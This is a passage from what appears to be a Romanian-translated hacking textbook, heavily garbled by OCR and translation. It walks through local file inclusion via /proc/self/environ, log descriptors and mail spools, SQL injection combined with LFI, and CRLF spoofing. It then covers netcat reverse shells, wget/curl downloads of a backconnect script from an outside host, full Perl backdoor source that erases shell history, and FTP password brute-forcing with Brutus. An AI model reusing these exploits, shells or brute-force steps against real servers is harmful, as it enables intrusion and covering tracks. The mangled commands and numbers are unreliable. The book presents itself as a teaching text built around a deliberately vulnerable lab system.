n:/b n continuare & Caracteristici noi ale PHP-Include SERVER ADMIN=adm n@s te cell HTTP KEEP ALIVE= Dezavantajul acestei metode este că șirul user-agent și cererea rău intenționată trebuie injectate în același timp (deoarece codul nostru din /proc/self/environ poate fi ușor modificat de orice alt proces ulterior) Găsirea jurnalelor serverului Apache Cum pot găsi locația fișierelor access Log și error Log? De fapt, să știi unde zac ei nu este deloc necesar În același director /proc, există o legătură simbolică către locația reală a jurnalelor Apache Îl puteți folosi pentru includere în mai multe moduri: Despre procesul și comenzile rapide Via d: /proc/X{PID}/fd/^{FD ID} Aici: W{PID} este ID-ul procesului (puteți afla uitându-vă la fișierul /proc/self/status), W{FD ID} sunt etichetele fișierelor corespunzătoare (de obicei și sunt jurnalele serverului Apache ) Exemplu: http://site com/ ndex php?page= / / / / / / / /proc/self/status Să presupunem că valoarea lui W{PID} este , apoi exploit-ul final va arăta astfel: curl "http://site com/ ndex php?page= / / / / / / / /rgos/ /fd/ &cmd=php nfo( ):" -N "Agent utilizator: " O Direct, fără a recunoaște procesul d, dar folosind sel f: curl "http://site com/ ndex php?page= / / / / / / / /rgos/self/fd/ &cmd=phpinfo( ):" -H "User-Agent: " Această metodă este mai fiabilă, deoarece sel f este procesul curent, iar în cazul anterior, d din proces se poate modifica În ambele metode prezentate (ca orice includere locală a jurnalelor de server Apache), aceste jurnale trebuie să fie citite Includerea mesajelor de e-mail De data aceasta, să ne imaginăm că ambele metode de includere prezentate nu funcționează pe site Astfel de cazuri se întâmplă, dar hackerii italieni din grupul Secteam au reușit să inventeze o modalitate dificilă de a implementa includerea printr-un mesaj obișnuit de e-mail „Repetiția este mama învățării” Majoritatea aplicațiilor web conțin funcția de a trimite e-mail ca parte a sistemului de înregistrare, orice abonamente etc Adesea, utilizatorul însuși poate schimba conținutul unei astfel de scrisori În același timp, *pix-systems poate salva o astfel de scrisoare local Procedura de includere locală prin e-mail arată astfel: Un hacker se conectează la o aplicație web pe un server vulnerabil Hackerul înlocuiește o parte din profilul său (de exemplu, „Despre mine”), care ar trebui trimisă în scrisoare ca confirmare a modificării informațiilor, cu un cod php rău intenționat pregătit pentru includere locală Hackerul își înlocuiește adresa de e-mail cu un șir precum wwwrun@localhost, unde wwwrun este utilizatorul sub care rulează demonul http (de asemenea, sunt posibile www-data, nobody, www, apache, wwwdata etc ) E-mailul trimis va fi în directorul /var/maii (sau /var/spooL/mail) și va avea numele utilizatorului sub care rulează demonul http Iată un exploit pentru această metodă folosind programul standard cu r : curl "http://site com/ ndex php?page= / / / / / / / /var/mal / wwwrun&cmd=php nfo();" Menționez că fișierul mesaj e-mail va fi disponibil doar utilizatorului căruia îi este adresată scrisoarea (adică serverul web trebuie să fie rulat în numele aceluiași utilizator) „Repetiția este mama învățării” Aceasta este ceva ca temele pentru cei mai interesați cititori „Repetitio est mater studiorum” (repetiția este mama învățării) – spuneau vechii romani și aveau dreptate Și încă ceva: atunci când o persoană primește informații din mai multe surse, acest lucru îi permite să le înțeleagă și să le înțeleagă mai bine Când americanii spun „think outside the box”, ei folosesc expresia: „That think out of the box” (literalmente ceva de genul: „think outside the box, adică uită-te dincolo de cutie cu gândul tău”) Pentru a arunca o privire nouă asupra a ceea ce s-a spus în această carte despre incluziunile de fișiere locale (LFI) și la distanță (RFI) și despre protecția împotriva acestora, pentru a repeta trecutul, pentru a învăța o mulțime de lucruri noi, vă sugerez să citiți următoarele articol pe forumul hackerilor: https: //rdot org/forum/showthread php?t= Multe dintre comentariile la articol sunt, de asemenea, de o valoare considerabilă Asigurați-vă că le citiți cu atenție De la ei veți învăța o mulțime de lucruri interesante, de exemplu, cum să înlocuiți nuli -byte dacă serverul web rulează Windows Și, în general, simțiți ce este o abordare creativă în hacking După cum a menționat Matrix, „Trebuie să rețineți că cazurile de hack în sine sunt foarte flexibile Adică dacă există Caracteristici noi ale PHP-Include ceva ce nu poți, dar vrei cu adevărat, atunci există șanse să-l obții, doar că metodele pot fi cele mai pervertite, nu descrise nicăieri Cititorii și recenzenții (inclusiv Matrix) doresc mai multe exemple reale în carte, dar pot recomanda o altă abordare - să caute pe Internet descrieri ale vulnerabilităților pentru motoarele disponibile în sistemul de testare DVL Experiment Sapă în codul sursă al motoarelor Pot adăuga că pentru unul dintre motoarele instalate în sistem există o exploatare proof-of-concept pe Internet pentru injectarea oarbă SQL folosind întârzieri, dar pentru a verifica funcționarea acestuia, aveți nevoie de o rețea locală de domiciliu de două mașini Pentru că, în acest caz, nu există nicio posibilitate ca un singur computer să joace rolul unui atacator și al unei victime în același timp Și puțin despre „revoltajul” de până acum pentru începători Cea mai nouă (aș spune, rafinată) metodă de exploatare a LFI se bazează pe implementarea limbajului PHP în sine și complexitatea interacțiunii interpretului PHP cu serverul web Apache Această vulnerabilitate nu poate fi exploatată „cu mâinile goale”, deoarece implică utilizarea unui exploit Perl care funcționează la nivelul pachetului de rețea Toate informațiile sunt aici https://rdot org/forum/showthread php?t= Tot mai târziu, în revista Hacker a apărut o publicație cu o analiză a acestei vulnerabilități (nr , ) Citiți, înțelegeți, urmați exemplele Și, bineînțeles, nu uitați să respectați legile țării dvs și ale altor state Un pic despre situații neobișnuite Când m-am hotărât în prima ediție să ofer o schiță aproximativă a pătrunderii unui hacker (vezi capitolul ), am primit critici destul de severe din partea experților care cunosc complexitatea acestui subiect Am fost acuzat că am simplificat prea mult abordarea Totodată, cei care sunt noi în acest domeniu, dimpotrivă, mi-au mulțumit pentru oportunitatea de a vedea o anumită schemă grafică, care a ajutat la înțelegerea și sistematizarea mai bună a materialului capitolelor precedente Desigur, am remarcat în carte că întreaga varietate de situații reale nu se limitează la această schemă În special pentru a doua ediție, am găsit un exemplu interesant, după părerea mea, în care vulnerabilitatea este o combinație între o injecție SQL obișnuită și o includere de fișiere locale Fără cunoașterea ambelor subiecte, este pur și simplu imposibil să exploatezi această vulnerabilitate Imaginează-ți că un hacker vede în fața lui o injecție SQL aparent banală: http://www site com/s te/ ndex php? page d=- +uni on+select+ Primește mesajul obișnuit în astfel de cazuri de la o eroare de nepotrivire a numărului de coloane: Un pic despre situații neobișnuite Avertisment: instrucțiunile SELECT utilizate au un număr diferit de coloane select * din s te navigation unde nav d=- union select Apoi efectuează o selecție pentru a elimina eroarea Apropo, când am descris metoda de injectare SQL în sine, nu am menționat că există o metodă mai ușoară pentru selectarea numărului de coloane decât adăugarea lor pe rând Funcționează cel puțin în MySQL În acest caz, este dată o directivă SQL pentru a ordona datele interogării după un anumit număr de coloană (în primul rând, se ia o valoare evident supraestimată a numărului de coloană), adică pentru un site dat, poate fi următoarea directivă: http://www site com/s te/i index php? pagei d=- +order+by+ La care hackerul primește ceva de genul următor mesaj de eroare: Avertisment: coloana „ ” necunoscută în „clauza de ordine” selectați * din site navigation unde nav id=- comandați până la Acest mesaj indică prezența unei coloane necunoscute, adică că nu există nicio coloană cu numărul Apoi hackerul încearcă în loc de și nu primește un mesaj de eroare Adică, coloana numărul există Prin astfel de manipulări simple și raționament logic simplu, hackerul află curând că există, să zicem, de coloane în clauza select S-ar părea că scopul a fost atins, puteți scrie o interogare SQL cu numărul corect de coloane: pageid=- +union+select+l, , , , , , , , , , , , , Cu toate acestea, în locul ecranului dorit de hacker cu câmpuri afișate, apare o nouă serie de mesaje de eroare Unele numere din interogarea introdusă apar în mesaje de eroare, dar într-un mod foarte ciudat, de exemplu: Avertisment: loadtheme(/home/www/ftp-site/web/site/themes/ /theme php) [funcție loadtheme]: nu s-a putut deschide fluxul: Nu există un astfel de fișier sau director în /home/www/ftp-site/web/site/modules/core/renderer api php pe linia Avertisment: loadthemeO [function inel ude]: deschiderea „/home/www/ftp-site/web/sitet/themes/ /theme php” eșuată pentru includere (include path=' :/usr/share/php:/ usr/share/ pear') în /home/www/ftp-site/web/site/modules/core/renderer api php pe linia Aici parametrul numărul (evidențiat în mod special cu aldine în listă) este în locul numelui directorului: ca parte a căii utilizate de funcția i ncl ude Adică nu vedem în fața noastră nimic altceva decât LFI (incluziunea fișierelor locale) Nu este surprinzător că nu a fost găsit un astfel de director și nici fișierul theme php Dar ce împiedică un hacker să înlocuiască, de exemplu, următoarea construcție în locul parametrului numărul : / / / / / / / / / / / / /etc/passwdOO Caracteristici noi ale PHP-Include Aici, numărul de caractere de traversare a directorului este luat cu o marjă, pe o cale anume din mesajul de eroare se vede că suntem la nivelul de imbricare din directorul rădăcină (/) Null-byte oprește numele fișierului suplimentar (theme php) Desigur, un astfel de parametru nu poate fi înlocuit în formă deschisă, va cauza o eroare de sintaxă SQL În esență, ar trebui să fie un șir cu ghilimele simple, dar caracterul cu ghilimele simple este filtrat Cu toate acestea, astfel de probleme minore nu-i opresc niciodată pe hackeri, ei pur și simplu convertesc acest parametru în codificare hexazecimală (am recurs deja la această tehnică mai devreme când studiem injecția SQL) Deci, parametrul numărul va arăta astfel: x e e f e e f e e f e e f e e f e e f e e f e e f f Introducând cererea în întregime, hackerul primește conținutul fișierului /etc/passwd pe ecran Cum îl poate folosi, vom vorbi mai târziu (vezi capitolul OB) Cu toate acestea, succesul acestei încercări nu înseamnă că ar trebui să înceteze Să presupunem că jurnalele serverului web s-au dovedit a fi ilizibile, așa că orice tehnică de injectare în ele este, de asemenea, imposibilă Cu toate acestea, puteți folosi opțiunea interesantă de injectare în fișierul /pros/self/environ, descrisă chiar la începutul acestui capitol Desigur, calea către /proc/seLf/environ este codificată în valori hexazecimale, ca în cazul precedent Pentru a utiliza exploit, este necesar suportul Linux pentru comanda cur - este acceptat în majoritatea distribuțiilor Lucrarea se desfășoară din linia de comandă (în consolă) a computerului atacator Pentru cazul studiat, din cauza particularităților exploatării printr-o interogare SQL, codul exploit-ului de mai sus va trebui să fie oarecum simplificat (fără pierderea funcționalității) Simplificarea constă în faptul că comenzile de sistem dorite nu sunt introduse prin parametrul cmd, ci direct ca argument la funcția passthru, care le execută Textul integral al exploit-ului este următorul: cu г "http://www site com/slte/ ndex php?pageid=- +uni on+select+ x e e f e e f e e f e e f e e f e e f e e f e e f f f c f e f e f d d c , , , , , " -H "User-Agent: " În acest exemplu particular, comenzile Îs - la, uname -a și pwd vor fi executate secvențial (adică, obținerea listei directorului curent, a numelui mașinii și a directorului curent) Desigur, comenzile pot fi înlocuite cu oricare alta Desigur, întregul exemplu este o linie lungă de comandă, în carte este împărțit în subșiruri doar din lipsă de spațiu Cu un astfel de acces la comenzile serverului, un hacker poate deja să plănuiască să încarce un shell web cu drepturi depline sau un shell de backconnect S-ar putea întoarce la acest exemplu interesant după ce a citit o serie de capitole ulterioare și s-ar putea gândi la modul în care în această situație un hacker ar putea încerca să obțină controlul deplin asupra serverului (drepturile root) Cu toate acestea, am decis să mă limitez la acest exemplu De ce? Deși răspunsul la prima ediție a acestei cărți a fost în mare parte pozitiv, unul online Concluzii pentru programatorii web Într-un magazin, un cititor a comentat prima ediție după cum urmează: „Un alt eseu despre modul în care hackerii cred că hackerii hack site-uri web” Această ironie m-a făcut să zâmbesc Cum pot răspunde la o astfel de critică? Da, exact așa pirata ei Sunt aici pentru a oferi elementele de bază și poate puțin mai mult Dar elementele de bază sunt destul de reale și aplicabile Și conform observațiilor mele, unii autori complet diferiți (nu îi voi numi aici) păcătuiesc scriind un „eseu pe această temă”, ale căror cărți au fost publicate cu destul de mult timp în urmă și sunt în mare parte învechite Desigur, există și multă literatură bună Orice critică este de ajutor și am încercat să ofer mai mult material nou și mai multe exemple practice în a doua ediție Concluzii pentru programatorii web Ce concluzie ar trebui să tragă un programator web din toate cele de mai sus? Trebuie să fii foarte atent când scrii cod, deoarece un hacker poate folosi o combinație nestandard de trucuri într-o situație aparent inofensivă Trebuie să fim atenți atunci când eliminăm defectele, deoarece de multe ori acest lucru se întâmplă conform principiului „tratăm un lucru, schilodăm altul” (nu îmi place această zicală, dar în acest caz reflectă bine esența problemei) Iată un exemplu similar: un programator web novice a „vindecat” LFI, în opinia sa, într-un mod frumos și ușor de utilizat: dacă o pagină cu acest nume nu este găsită, textul parametrului din bara de adrese web este ușor formatat ( scris cu literă mare) și litere mari intră în subtitrare pe pagina web generată Spune că nu a fost găsit Dar, în același timp, programatorul nici măcar nu s-a gândit la o astfel de posibilitate precum cross-site scripting Adică, în șirul primit, etichetele html nu sunt filtrate în niciun fel și chiar și eticheta „răușitoare” este inclusă în liniște în codul paginii Adică, are loc scripturi pasive între site-uri Desigur, acest lucru nu mai este la fel de „înfricoșător” precum o includere de fișiere locale, dar totuși, este și o vulnerabilitate CRLF-include CRLF-include este o vulnerabilitate foarte simplă care permite, de exemplu, falsificarea mesajelor în chat-uri Să presupunem că mesajele de chat sunt stocate într-un fișier text în următorul format: [ : : ] salut tuturor! [ : : ] salut Admln! După mesajul dvs (să presupunem că porecla dvs din chat este A ex), pur și simplu introduceți un cod de alimentare de linie hexazecimal (EDA) și imitați un mesaj din numele altcuiva: Bună, oameni buni! J a[ : : ] dă-mi drumul Lapochka! Ca rezultat, fișierul mesaj va arăta astfel: [ : : ] salut tuturor! [ : : ] salut Admln! [ : : ] Salut, oameni buni! [ : : ] pleacă de lângă mine, Lapochka! În unele chat-uri ale rețelelor locale de partajare a fișierelor (de exemplu, FlyLinkDC ++), nici măcar nu trebuie să introduceți caractere YOa - trebuie doar să apăsați combinația de taste Ctrl + Enter (Codehunter, alias Here Dragon, mi-a subliniat această oportunitate) Partea a III-a Ce urmează? ♦ A Obținerea accesului complet la shell V Ghicirea parolei de la distanță С Schimbarea parolelor locale D Elevație de privilegii E Ascunderea urmelor de prezență F Cercetarea sistemului ♦ Algoritmi pentru preluarea controlului asupra serverului ♦ Exploatări de la distanță • Contracararea hackerilor Sarcini reale de securitate IT O A Obținerea accesului YM complet la shell Următorul pas este să obțineți acces complet la shell-ul de comandă (shell) De ce este important? Pe lângă comoditatea evidentă a muncii, cu un astfel de acces, puteți încerca să obțineți drepturi de superutilizator (rădăcină) Mulți hackeri începători chiar consideră că este absolut necesar să folosească exploit-uri de escaladare locală, dar în capitolul D voi descrie o modalitate dificilă de a obține drepturi de superutilizator doar cu un shell web Să ne uităm la cum să obțineți acces normal la shell cu shell-ul web creat în Capitolul Cel mai simplu și mai fiabil mod, în opinia mea, este să utilizați utilitarul netcat (rulat de comanda ps) Acest utilitar este prezent în multe versiuni gratuite de Unix (inclusiv Linux) Din păcate, nu întotdeauna „înțelege” opțiunea -e, care este necesară pentru a executa o comandă arbitrară după ce se stabilește o conexiune (în cazul nostru, pentru a lansa un shell de comandă), dar în distribuția noastră DVL, acest lucru este în regulă Mai întâi, hackerul trebuie să ruleze utilitarul netcat pe linia de comandă de pe computerul său în modul de ascultare a portului, după cum urmează: ps - -p -v -r Aici, după parametrul -p, este indicat numărul portului de ascultare ( ) la care se va face legătura din exterior Puteți utiliza orice alt număr de port gratuit În loc de opțiunea -v (verbose - verbose), puteți specifica opțiunea -vv (very verbose - very verbose) Hackerul trebuie apoi să ruleze netcat pe gazda de la distanță: ps -e /bin/sh Hacker IP Această comandă realizează o conexiune inversă (back connect) cu computerul hackerului După parametru, programul executabil este indicat, în acest caz, shell-ul de comandă /Нn/sh Deoarece adresa IP a gazdei locale este , comanda noastră va arăta astfel: ps -e /bin/sh Drept urmare, un hacker va vedea pe computerul său un mesaj că a avut loc o conexiune (conectare), după care va putea introduce comenzi care vor Obținerea accesului complet la shell rulează pe sistemul de la distanță În cazul nostru, pentru a rula netcat pe un sistem la distanță, hackerul trebuie să introducă comanda în linia browserului ps+-e+/s n/sh+ + Din păcate, o conexiune inversă folosind un browser pe sistemul nostru nu este posibilă Dar pentru a vedea cel puțin cum funcționează conexiunea inversă, puteți porni ambele instanțe de netcat prin consolă Deci, pe mașina virtuală Damn Vulnerable Linux, lansați două ferestre de consolă, așa cum se arată în Figura A Orez A Obținerea unui shell folosind utilitarul ps și executarea comenzilor de la distanță Acum, în prima consolă tastați comanda ps - -p -ѵѵ -р După apăsarea tastei Enter, ar trebui să apară un mesaj stening pe Sapu] Aceasta înseamnă că netcat așteaptă o conexiune de intrare pe portul În a doua consolă, tastați comanda nu pe nimeni Apoi apăsați tasta Enter Această comandă vă permite să comutați de la utilizatorul root la utilizatorul nimeni Acest lucru este pentru a face să pară ca în viața reală, deoarece până acum am accesat sistemul de la distanță doar ca utilizator nimeni Acum, în a doua consolă, rulați programul netcat: ps -e /bin/sh A Obținerea accesului complet la shell După ce apăsați tasta Enter, treceți la prima consolă În acest caz, în prima consolă ar trebui să apară un mesaj despre o conexiune externă: conectați-vă la [ ] de la (NECUNOSCUT) [ ] Aceasta înseamnă că utilitarul netcat de la a doua consolă (în viața reală, de pe computerul piratat) s-a conectat la netcat din prima consolă (în viața reală, consola de pe computerul hackerului) Apoi, tastați comanda id în prima consolă și asigurați-vă din nou că sunteți conectat la a doua consolă, deoarece ID-ul de utilizator aici este nimeni, iar în prima consolă sunteți utilizatorul root De asemenea, puteți rula uname -a sau orice altă comandă Pentru a termina conexiunea cu computerul victimă, executați comanda de ieșire sau apăsați pur și simplu tastele Ctrl+C Dar dacă computerul victimă nu are utilitarul netcat sau nu permite utilizarea opțiunii -e? Apoi puteți „completa” într-un director care poate fi scris de pe computerul de la distanță un mic program de hacker care realizează o conexiune inversă; un astfel de program se numește back connect shell (back connect shell) și îl puteți găsi prin Google introducând interogarea back connect shell download Pentru munca reală, un hacker trebuie să găsească o adresă pe Internet unde acest program este deja sub forma unui fișier text (în forma sa pură), sau să îl plaseze pe propria pagină de pe Internet, astfel încât de acolo să poată să fie copiat pe computerul țintă Să presupunem că un hacker a găsit un astfel de shell backconnect și l-a plasat pe pagina sa turade de pe site-ul Narod ru sub forma unui fișier text backconnect txt (Nu faceți niciodată acest lucru, chiar dacă descărcați un fișier de acolo pe computerul local!) Apoi, pentru a-l descărca pe computerul țintă, el poate folosi comanda wget cu următoarele opțiuni: wget - /tmp/bc pl http://mypage narod ru/backconnect txt Opțiunea - vă permite să specificați numele fișierului de ieșire după el (asigurați-vă că introduceți litera O cu majuscule, deoarece în sistemele *nix, spre deosebire de Windows, cazul literelor din comenzi este diferit) În exemplul nostru, fișierul va fi încărcat în directorul /tmp sub numele bc pl Alternativ, puteți descărca fișierul folosind comanda cur sau ftp În cazul cu r , comanda va arăta astfel: curl -o /tmp/bc pl http://mypage narod ru/backconnect txt După descărcare, nu uitați să rulați următoarea comandă pentru a face acest fișier executabil: chmod /tmp/bc pl Apoi, rulați-l pentru execuție, specificând pur și simplu numele fișierului /tmp/bc pl și argumente: adresa IP a computerului hackerului la care se conectează și numărul portului În cazul nostru, comanda va fi cam așa: /tmp/bc pl Am găsit deja un shell perl backconnect pe internet, așa că haideți să îl descarcăm direct pe computerul nostru Pentru a face acest lucru, accesați Obținerea accesului complet la shell http://otaku-studios com/showthread php/ -Perl-Backconnect și copiați textul programului în clipboard Pentru orice eventualitate, o voi cita aici integral: #!/usr/bin/perl utilizați IO::Socket: Ssystem = '/bin/bash'; $ARGC=@ARGV; prinț "IHS BACK-CONNECT BACKDOOR\n\n": dacă ($ARGC!= ) { prinț "Utilizare: $ [Gazdă] [Port] \n\n"; die „Ex: $ \n”; } utilizați Socket; utilizați FileHandle: socket(SOCKET, PF INET, SOCK STREAM, getprotobyname('tcp')) sau die prinț ”[-] Imposibil de rezolvat gazda\n”; connect(SOCKET, sockaddrJn($ARGV[l], inet aton($ARGV[ ]))) or die prinț "[-] Nu se poate conecta gazda\n"; prinț ''[*] Rezolvarea HostName\n"; prinț „[*] Se conectează $ARGV[O] \n”: prinț ”[*] Spawning Shell \n": prinț ''[*] Conectat la gazdă la distanță \n”: SOCKET->autoflush(); deschide(STDIN ">&SOCKET"); deschide(STDOUT,">&SOCKET"); deschide(STDERR,">&SOCKET"); prinț "IHS BACK-CONNECT BACKDOOR \n\n": systemC'unset HISTFILE: unset SAVEHISTiecho ==Systeminfo== : uname -aiecho; echo ==Informații utilizator== ; id;echo:echo ==Director== ; pwdiecho; echo ==Shell== "): sistem(Ssistem): #EOF Apoi, deschideți editorul Kate, creați un fișier nou, lipiți conținutul clipboard-ului (textul shell-ului nostru) acolo și salvați fișierul în directorul /tmp ca bc pl Folosim aceleași două ferestre de consolă ca în exemplul anterior În a doua fereastră, dacă ați redeschis-o, executați din nou comanda su nobody Dacă nu l-ați închis, atunci nu trebuie să rulați această comandă Apoi rulați următoarea comandă acolo: chmod /tmp/bc pl În prima fereastră de consolă, introduceți comanda, ca și în timpul precedent (după care nu uitați să apăsați tasta Enter): ps - -p -ѵѵ -r În a doua consolă, rulați shell-ul nostru: /tmp/bc pl A Obținerea accesului complet la shell Orez A Obținerea unui Shell cu programul IHS Back-Connect Treceți la prima consolă și observați rezultatul (Figura A ) După cum puteți vedea, atunci când backconnect-ul este lansat, shell-ul execută automat trei comenzi de hacker (uname -a, id și pwd) și afișează rezultatul executării lor Dar, de fapt, încă câteva comenzi sunt executate înainte de aceasta: dezactivați HISTFILE dezactivați SAVEHIST Acest lucru poate fi văzut în codul sursă al programului Aceste comenzi împiedică stocarea istoricului comenzilor pe care le introduceți în fișierul bash history Hackerii adevărați le introduc întotdeauna înainte de a începe fiecare sesiune pe un sistem străin pentru a lăsa mai puține urme Apoi puteți introduce singur comenzi Programele ca cel pe care tocmai l-ați folosit sunt numite și backdoors (backdoor - back door, back door, loophole) Și de fapt, pătrundem în sistem nu ca un utilizator normal, introducând un login și o parolă, ci ca de pe o ușă din spate Ei bine, în capitolele următoare ne vom uita la modul în care un hacker poate obține acces cu autentificarea și parola unui utilizator legal Uneori directorului /tmp i se atribuie un așa-numit bit sticky, care arată ca drwxrwxrwt în lista de directoare Acest bit împiedică alți utilizatori să ștergă fișierele din acest director Apoi, pentru a descărca shell-ul back-connect (sau exploatările pentru a obține drepturi de root), trebuie să utilizați un alt director care are permisiuni drwxrwxrwx Astfel de directoare pot fi găsite cu comanda find: find / -type d -perm - -prinț > /tmp/ fi le & Comanda specificată va găsi toate directoarele potrivite și va salva lista lor în fișierul /tmp/ file V Ghicirea parolei de la distanță Nu degeaba am vorbit în capitolul despre modalități de a obține conținutul fișierului /etc/passwd cu nume de utilizator de sistem (autentificări) Acum vom învăța cum să folosim programe care ghicesc parolele pentru resursele de la distanță Astfel de programe (parola brute-forcers) sunt numite și brute forcers În primul rând, putem verifica parolele care se potrivesc cu numele de utilizator Dacă în sistem sunt mulți utilizatori (sute sau chiar mii), există șansa să avem noroc, deoarece conform statisticilor, aproximativ - % dintre ei au o parolă care se potrivește cu autentificarea Pentru început, pe baza fișierului /etc/passwd, trebuie să pregătiți manual sau folosind un program simplu (pe care îl puteți scrie singur sau îl puteți prelua pe Internet) un fișier text cu o listă de utilizatori și parolele acestora (în versiunea originală) versiunea, care coincide cu numele de utilizator) a formularului userl:userl utilizator :utilizator userN:userN În continuare, trecem de la mașina virtuală la Windows, găsim și descărcam programul Brutus AET de pe Internet (http://www hoobie net/brutus) În plus, trebuie să găsiți și să descărcați programul client PuTTY (sub Windows) Programul PuTTY vă permite să vă conectați la diferite porturi de pe un sistem de la distanță folosind diferite protocoale Astfel, în loc să scanați porturile sistemului de la distanță, puteți verifica pur și simplu cele mai importante numere de porturi conectându-vă la acestea folosind programul PuTTY (Figura B ) Pe Linux, puteți utiliza comanda ps în acest scop Mai întâi trebuie să verificați porturile (FTP - descărcarea și încărcarea fișierelor), (POP - primirea e-mailurilor), (telnet), (SSH - acces de la distanță la linia de comandă prin protocolul SSH) Adevărat, Brutus nu vă permite să lucrați cu protocolul SSH, dar pentru acest caz avem programul BruteSSH în Linux Wallet Pentru a utiliza PuTTY pentru a vă conecta la un port SSH, trebuie să introduceți numele gazdei sau adresa IP (Numele gazdei (sau adresa IP)) - în exemplul nostru, adresa este www site com, dar de fapt aveți nevoie de un adresa reală Părăsiți portul V Ghicirea parolei de la distanță Orez B Fereastra de pornire a programului PuTTY implicit ( ) Tipul de conexiune (Tipul de conexiune) este, de asemenea, lăsat implicit - SSH Făcând clic pe butonul Deschidere, se deschide ecranul terminalului Dacă afișează un prompt precum ogi n ca:, atunci accesul SSH este permis În caz contrar, va apărea o casetă de mesaj de eroare și fereastra terminalului se va închide Pentru testare, vă puteți conecta la computer la Desigur, sistemul va da un mesaj de eroare deoarece acest port este închis pe computer Pentru a vă conecta manual la porturile , , , introduceți numărul corespunzător în câmpul Port și setați comutatorul Raw în grupul Tip de conexiune Apoi, rămâne să faceți clic pe butonul Deschidere Similar cu cazul precedent, dacă în fereastra terminalului care se deschide apare un text cu un prompt de sistem, atunci portul este deschis Acum este rândul programului Brutus (Figura B ) În funcție de porturile deschise pe sistemul studiat, selectați tipul de protocol (Tip) Să presupunem că portul (FTP) este deschis În acest caz, selectați opțiunea FTP Nu este posibil să ridicați parola utilizatorului root în acest fel și nu numai pentru că este complexă, ci pur și simplu pentru că autentificarea de la distanță a utilizatorului root prin protocolul FTP este interzisă în sistemele moderne Dar este posibil să găsiți parolele utilizatorilor obișnuiți Pentru început, selectați opțiunea Combo List din lista Pass Mode (Mod Parolă) și în câmpul Combo File specificați numele fișierului nostru cu perechi precum login: password Un exemplu de astfel de fișier este furnizat împreună cu programul Brutus sub numele example-combo txt Desigur, în câmpul țintă trebuie să specificați Ghicirea parolei de la distanță adresa gazdei care este examinată După toate pregătirile, faceți clic pe butonul Start Programul va porni și, dacă reușește, parolele găsite (și, bineînțeles, login-urile la care au venit) vor apărea în partea de jos în tabelul cu rezultate pozitive de autentificare Orez B Fereastra principală Brutus Dacă programul nu găsește nimic, puteți încerca căutarea în dicționar Ca o mică digresiune, voi cita rezultatele unui studiu realizat de Morris și Grampp (Morris și Grampp) Acești autori au testat zeci de mașini folosind o selecție dintre cele mai comune de nume feminine ca parole de testare și adăugând o cifră după nume Numărul total de parole încercate a fost de Cel puțin una dintre aceste de parole s-a dovedit a fi corectă pe fiecare dintre mașinile testate Pentru a căuta prin dicționar, trebuie să pregătiți două fișiere - un fișier cu nume de utilizator și un fișier cu parole (dicționar de parole) Brutus vine cu un mic dicționar de parole numit word txt Dicționare mai voluminoase pot fi găsite pe Internet sau împrumutate din alte programe brute-force Există dicționare tematice (de exemplu, cuvinte legate de cinema, computere sau lista deja menționată de nume feminine) Există, de asemenea, dicționare pentru diferite limbi (engleză, germană, franceză, rusă, arabă etc ) După aceea, este suficient să selectați opțiunea Word List din lista Pass Mode și să specificați fișierul de autentificare și fișierul dicționar în câmpurile User File și, respectiv, Pass File V Ghicirea parolei de la distanță Pentru a încerca programul Brutus pe un computer local, trebuie să instalăm și să rulăm orice server FTP gratuit pentru Windows Alegerea mea a căzut pe serverul TYPSoft FTP Îl puteți găsi la http://soft mydiv net/win/fiLes-TYPSoft-FTP-Server htmL Apropo, atunci am găsit o mulțime de informații pe Internet despre vulnerabilitățile acestui server FTP, așa că pentru o utilizare serioasă de zi cu zi, nu vi-l recomand, căutați ceva mai bun Serverul nu necesită instalare, doar rulați fișierul executabil ftpserv executabil Apropo, selectând comanda Configurare ► FTP din meniu, puteți seta limba interfeței la rusă (Limba - rusă), dar am făcut totul cu interfața în limba engleză Cu comanda Setup ► Users, am creat un utilizator la miezul nopții cu o parolă de (Figura B ) Orez B Crearea unui nou utilizator în TYPSoft FTP Server După aceea, în directorul cu programul Brutus, am creat fișierul combo txt, pe baza fișierului example-combo txt de acolo, și am adăugat un utilizator nou cu o parolă (midnlght: ) Apoi, am configurat programul Brutus, așa cum se arată în fig B și l-a lansat făcând clic pe butonul Start În partea de jos a figurii, puteți vedea rezultatul unei autentificări FTP pozitive (parola găsită) În fila Hartă a serverului nostru FTP, puteți vedea clar cum programul Brutus a ghicit parolele (Fig B ) Deci activitatea unui hacker în viața reală nu va trece neobservată Apropo, TYPSoft FTP Server stochează în fișierul users ini printre alte informații despre utilizatori și hash-uri schb ale parolelor lor, care sunt ușor de recuperat folosind instrumentele descrise în capitolul următor Ghicirea parolei de la distanță Orez B Selectarea parolelor conform listei combo txt Parola a fost găsită! Bl TYPSoft FTP Set ver Qln II? Ajutor pentru configurare server de fișiere | Principal = Informații utilizator l[ : : ] - [ ] Conectați-vă la L Obțineți „usernamJ [ : : ] - [ ] Conectați-vă la Obțineți numele de utilizator [ : : ] - [ ] Conectați-vă la Obțineți numele de utilizator [ : : ] - [ ] Conectați-vă la Obțineți numele de utilizator [ : : ] - [ ] Eșuare autentificare: IP ADMIN utilizator: [ : : ] - [ ] Conectați-vă la Obțineți numele de utilizator [ : : ] - [ ] Utilizator MIDNIGHT conectat [ : : ] - [ ] MIDNIGHT: Director curent: C:\TEMP\ [ : : ] - [ ] Eșec autentificare: IP ADMIN utilizator: [ : : ] - [ ] Eșuare autentificare: IP ADMIN utilizator: [ : : ] - [ ] Client MIDNIGHT, Deconectat ( : : Min) [ : : ] - [ ] Conectați-vă la Obțineți numele de utilizator [ : : ] - [ ] Eșec autentificare: IP ADMIN utilizator: utilizatori Orez B Fereastra principală a serverului TYPSoft FTP cu informații despre încercările de conectare V Ghicirea parolei de la distanță Acum puteți accesa site-ul prin FTP Pentru a face acest lucru, puteți utiliza orice program client care acceptă o conexiune FTP De exemplu, vă puteți conecta la server folosind programul Total Commander și puteți introduce numele site-ului, numele de utilizator și parola Prin Total Commander, puteți copia fișiere de pe server pe dvs (și apoi le puteți vizualiza pe computer) sau puteți încărca fișierele pe server În acest fel, hackerii începători deformază site-urile După cum am menționat deja în treacăt la începutul cărții, defacerea (defacerea - a priva o persoană) este o schimbare de către un hacker a paginii principale a site-ului În acest caz, fișierul index html sau index php este redenumit în index old și, în schimb, un nou fișier index html este încărcat de pe computerul hackerului, care de obicei conține niște imagini amuzante și informații că site-ul a fost piratat Cu toate acestea, vă asigur, nu ar trebui să vă riscați reputația și cariera pentru câteva minute de plăcere îndoielnică, deși mai trebuie să știți ce este o defacere și cum se realizează De asemenea, ne putem accesa computerul prin FTP folosind 